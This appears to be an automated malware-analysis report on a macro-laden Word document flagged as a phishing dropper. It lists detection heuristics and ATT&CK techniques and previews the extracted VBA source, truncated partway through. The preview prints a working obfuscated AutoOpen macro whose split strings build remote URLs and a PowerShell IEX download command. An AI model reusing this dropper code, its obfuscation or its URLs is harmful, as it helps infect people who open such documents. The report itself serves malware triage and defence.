MALICIOUS
242
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1566.001 Spearphishing Attachment
The file contains a VBA macro with an AutoOpen procedure, which runs automatically when the document is opened — a common technique for executing malicious code. The macro uses a Shell() call to execute a payload, and the ClamAV signature 'Img.Dropper.PhishingLure-6443153-0' suggests a phishing lure. The obfuscated URL is likely used to download a second-stage payload.
Heuristics 7
-
ClamAV: Img.Dropper.PhishingLure-6443153-0 — critical — CLAMAV_DETECTION: ClamAV detected this file as malware: Img.Dropper.PhishingLure-6443153-0
-
VBA macros detected — medium — 3 related findings — OLE_VBA_MACROS: Document contains VBA macro code
-
Shell() call in VBA — critical — OLE_VBA_SHELL: Shell() call in VBA
-
AutoOpen macro — high — OLE_VBA_AUTOOPEN: AutoOpen macro
-
VBA p-code auto-exec with execution tokens — high — OLE_VBA_PCODE_AUTOEXEC_EXEC: The compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches macro documents that are p-code-only or whose source extraction failed, where no visible source is available.
-
Legacy WordBasic auto-exec macro marker — medium — OLE_LEGACY_WORDBASIC_AUTOEXEC: The OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence of an old Word macro execution surface; by itself it does not attribute a downloader or a parser CVE.
-
Embedded URL — info — EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
- URL http://www.iWd+iWdmivaiWd+iWdso.cl/iWd+iWdsltYb+tYbiWd+iWdhd1dv/tYb+tYb,hiWd+iWdtFOZQcDG5BTDWf0ho2o — In document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/main — In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 285418 bytes |
| SHA-256: f85f85e117d2a388a24be64a0524fcc718e44841a69327df5fdb368ca508b571 | | | |
Preview script — First 1,000 lines of the extracted script
' Module attribute header for the document class module "ThisDocument".
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' A second VB_Name follows immediately with no procedures in between: the
' preview appears to be two extracted modules concatenated, so AutoOpen and
' bFtqiDNoRwww below belong to the "qcWWCncUbUDm" module, not ThisDocument
' (presumed from the extractor's output layout — verify against the full
' macros.bas artifact).
Attribute VB_Name = "qcWWCncUbUDm"
' Auto-executing entry point: Word runs a procedure named AutoOpen when the
' document is opened (this is the OLE_VBA_AUTOOPEN finding in the report).
Sub AutoOpen()
' The eight string assignments in this Sub build concatenated literals that
' are never read again within the Sub. They look like filler around the one
' effective statement; whether the truncated remainder of the module reads
' them cannot be confirmed from this preview.
vsUWNwsFYiGAzI = "jXkJZGO" + "zQPsofjpGQ" + "IQdowAQC" + "vwocoOUJTZWn" + "YWFzGEZptAkl" + "oGjoJJE" + "ZAbnDZLaVju" + "bsGiwuMcwB" + "EqoaNZfQNjEwWd" + "CfNOYTqN" + "vzApOwbjXE" + "zPwzAqPjoW"
kEosjOhdcOcPfO = "pCQHYbRGNn" + "QNhEJYCBPvAW" + "MwtcIUASj" + "ANQhwSSwbFz" + "UwYFEMiwdpjAuZ" + "pwsnOjmjqtrE" + "wzYQROizECQn" + "kwLhQnYjdAiSk" + "hPhMMIuBf" + "Pifvklvcz" + "wnVJdEfzTzq" + "jwwhWqDftiTvRh"
dwrEGSJV = "uXiIdvihaRBjwD" + "EZUjNUZsv" + "BAcskfWbCnzHvC" + "AlVAfYivczjwdI" + "UfnKbuGoql" + "HwPPwdSjMjE" + "QZWEztDhtScST" + "kaCuwfOAQi" + "MDDfuwqPnXl" + "qGvmEko" + "zwctrjRnZd" + "IoZmpABzW"
CjzwVMoAsJPb = "iQaJoNiCq" + "HdQQUGmC" + "ShuPiuWTdnhT" + "haqVOqNlsjMXpV" + "wUtFGiJ" + "oBwPRuAPJpI" + "qZwrwpzZwisoYQ" + "JtbMUXtCUS" + "vrsTDihZOWV" + "JRfkhFJ" + "qBXqWhcn" + "wXdYVuIhii"
' The only statement with an effect: in VBA a parameterless Function named
' without parentheses is invoked, so this line calls bFtqiDNoRwww (defined
' further down in the preview) and stores its result in an otherwise unused
' variable. Whatever the macro does happens inside that function.
test = bFtqiDNoRwww
' This Shell call is commented out, so it does not execute from here. The
' report's OLE_VBA_SHELL finding may stem from the truncated part of the
' source or from the compiled p-code stream (OLE_VBA_PCODE_AUTOEXEC_EXEC);
' confirm against the full artifact before relying on this line as evidence.
' VBA.Shell$ bFtqiDNoRwww, 0
GzBAnqSv = "nMwLLkuTBzWFu" + "SzsinXX" + "CbzAqzW" + "fOjwlka" + "NlzofhIDM" + "jBvLfYRkJVMKtv" + "wRHZvPhYaRCXiX" + "SvorPVHTjI" + "AbEFCrEsjPAi" + "jBcVucAjN" + "CRWBfarzYQOOG" + "UOKTpqGSQX"
NslZGIzn = "CofpYRoRcOBUv" + "AfRhtWhk" + "ztSiFYR" + "RbSRfiVu" + "BoqBVnSjlt" + "bERGSojvGjjtK" + "ktcrUww" + "VUsuwdGzzUfc" + "MJLzrCZnoSuf" + "ktprQwsojwOXpC" + "HjOOhZYjRrcuX" + "jBzODtNKHDiksc"
zbCzkjFEj = "WMJYznBVoDvQJm" + "bwbLfwjv" + "TQaumTazRQ" + "jDlIPjPEZRhS" + "qIjdsABpR" + "EjNGiVczwsFd" + "KTvwhcVElz" + "EdjwEQPq" + "RjYBZhizU" + "aKMlYKzBTNvi" + "lDCEmftic" + "NGiutZAtX"
End Sub
Function bFtqiDNoRwww()
fHuKBRzl = "cCdkRQMi" + "uDmImvbspJ" + "lbuBZnoflWi" + "wjSFjGBCqp" + "jLSkiIYR" + "vnWAIcLdbjw" + "LfpZTprmnHnwPK" + "GCKXMEEcJMSzH" + "XaJsMYjcLLThfq" + "zZkzmEaRJjvHC" + "MBsjrPhiEDm" + "irwDfYNo" + "nhAVpzIz"
BDzNRFLhn = "mVhLwzEaU" + "JMdMtXPGLEqT" + "iQAmUAOtkkzBj" + "hYEwZdosf" + "rOHPlvqYThw" + "wKjaFrZbdLNHhi" + "FQqzqlau" + "tzHoubi" + "QmatOwXwTDwjBz" + "DokHchIJXPdh" + "jlhCdOqv" + "NrSSDXid" + "EtREzKTFR"
VFhtFOOh = Mid("jJsR6FErg/QGiWd+iWdOtYb+tYb0E/,httptYb+tYbiWd+iWd://iWd+tYb+tYbiWdfixxoiWd+tYb+tYbiWdo.iWd+iWdintYb+tYb/iWd+iWdpiWd+iWdubliciWd+it'+'Yb+tYbWd/PiWd+iWdRiWd+iWdLm709wAw0JXNQcszkaZUdsZt2OcD", 8, 156)
NCRPpviUUJ = "QRdwwJaz" + "aGUVjKcaiSFDW" + "OVZTrOBSYivnVj" + "tpdilmipSAps" + "OpuEtXPbZ" + "jilIhqZtowtpd" + "VlHffGSCWmD" + "kqtwRFUwtAzd" + "zsGAwVZ" + "RjIQjwSX" + "LwFwGiAqioUi" + "UmddjOMBaRdX" + "HkhhICbNo"
LuvvEFNN = "UTWwmFdRT" + "ShXrvQiCRMZ" + "HOqwwwFkT" + "TLDCEwQs" + "pOwHYTbYDTCz" + "oGMIFqJjMi" + "MNLotMfm" + "cjzKGScVXB" + "QJvWwpwtZ" + "DdfpvLInfqnQ" + "vEHBBnNoJK" + "pCSorDQlM" + "YGTUKGUisKdAk"
ctrujQuI = "YDsJGJR" + "EhiOVnGQELfl" + "bbnbPJzfSDVj" + "EanEGrIkYpjs" + "ubswQhDSw" + "FiqATCmiNij" + "fdAFoczClEjB" + "WmUmodTHw" + "VProimLWKfLv" + "wLtaVtqAz" + "lzPSrZFQahuip" + "nPQZhYWDaXWauC" + "OHhWaGrSUUzFPk"
iCZnhMs = Mid("5AG0amPtQoVQH4ov8H (('iEX (((tYb '+'.( q1b'+'eNv:COmspeC[4,24,25]-joiNitYb+tYbWdiWd) ( (iWdQd8friWd+iWdanc = newiWd+iWd-objeiWd+iWdcttY'+'b+tYb'+' SyiWd+iWmZE0mDKZNdO", 19, 137)
sYfZMjTqnkM = "SpouGMuuSOAttT" + "baCDiXwnjrjsGQ" + "npRSWBPWfzvdnF" + "RNBmRkbwCc" + "CHCZToiTaL" + "awtMEWDnuKi" + "aSrTzPMs" + "pCzHTFjGz" + "iJpmEsEfEs" + "iIUvbHcVi" + "OSMktuF" + "RXhuqDCljnav" + "IzAHufLrwDlU"
BjwizHUAow = "HEERqfJPcckwlR" + "qYkIBAcoaLPw" + "jkDqCcKvpb" + "OOjOHYN" + "XcBBkvdsi" + "dGahofrZt" + "JHqBwjtmTOhBzA" + "siiSuZjjjLV" + "haBWhiRFPm" + "EBBqYPh" + "IaGvzIGwXZa" + "pbJMMSrz" + "fvLGhiQtiK"
vVMmAdIn = "QqdBKwwun" + "hnSQtqapuj" + "GSLdzOusT" + "vaZnLHiccw" + "VfSUcORBXOrkw" + "XRYKjECU" + "mMsdhjw" + "RndlntIX" + "crvFEqb" + "opFStrmBijI" + "lkRaCZwUYjYP" + "jcKYuhWRzttq" + "YwrkJMAoOsZUDi"
uOuEF = Mid("2OikslwNFCX72X6GONjsWd8huaiWdiSz4Was", 21, 9)
WlYEWmljYF = "wjMzbiENb" + "ufpbKdrpiGY" + "EcfupPiqFoOK" + "FOKlhOdY" + "lPWiXAYDDEsQf" + "TjoojlaFRiQE" + "hD
... (truncated)
|
|||